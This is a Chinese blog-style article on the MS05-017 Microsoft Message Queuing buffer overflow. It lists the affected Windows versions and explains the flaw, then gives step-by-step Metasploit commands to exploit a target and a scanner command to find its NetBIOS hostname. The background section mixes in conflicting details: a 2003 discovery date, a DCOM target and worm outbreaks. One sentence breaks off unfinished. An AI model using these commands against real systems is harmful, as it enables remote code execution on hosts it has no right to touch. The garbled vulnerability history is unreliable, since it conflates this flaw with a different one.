1. 程式人生 > >ms05-017漏洞原理與復現

ms05-017漏洞原理與復現

dcom rpo pandas read enc 補充 之前 機器 home

漏洞描述
此漏洞由lds-pl.net漏洞研究組在2003年7月16日發現,漏洞及exp在網上公開後,網上出現了大量的×××實例,利用此漏洞的蠕蟲也大量出現。

漏洞編號

CVE-2005-0059
OSVDB-15458
MSB-MS05-017
BID-13112

×××目標

DCOM接口的服務器端

影響系統

    Microsoft Windows XP Service Pack 1
    Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
    Microsoft Windows 2000 Service Pack 4
    Microsoft Windows 2000 Service Pack 3
    Microsoft Windows 98 Second Edition (SE) 
    Microsoft Windows 98

漏洞原理

msmq在將輸入的字符串傳遞到緩沖區之前沒有執行正確的驗證,因此,可通過傳遞特制的msmq消息來觸發漏洞造成緩沖區溢出漏洞。漏洞可導致遠程代碼執行、本地提權。由於msmq

概念解釋

1. msmq( MicroSoft Message Queuing, 微軟消息隊列)是在多個不同的應用之間實現互相通信的一種異步消息傳輸模式,互相通信的應用可以位於同一臺機器上,也可以分布於網絡空間中的任意位置。msmq實現原理:消息的發送者將想要發送的消息發送至一個message中,然後保存至一個系統公共空間的消息隊列(Message Queuing)中,需要接受message的應用從Message Queuing中取出Message進行處理。msmq在消息傳遞時,需要借助hostname來通信。

metasploit exp可用目標

Windows 2000 ALL 
Windows XP SP0-SP1 (English)

metasploit利用ms05-017

利用此payload需要netbios hostname、ip、port三項內容

use exploit/windows/dcerpc/ms05_017_msmq
set hname <target hostname>
set rhost <target ip>
set rport <target port>
run -j

msf中查看hname

use scanner/smb/smb_version
set rhost <target ip>
set threads 24
run

不使用metasploit情況下利用ms05-017

暫未發現,後續補充

參考文章

  1. MS05-017 Microsoft Message Queueing Service Path Overflow
  2. Virus Encyclopedia
  3. MSMQ

ms05-017漏洞原理與復現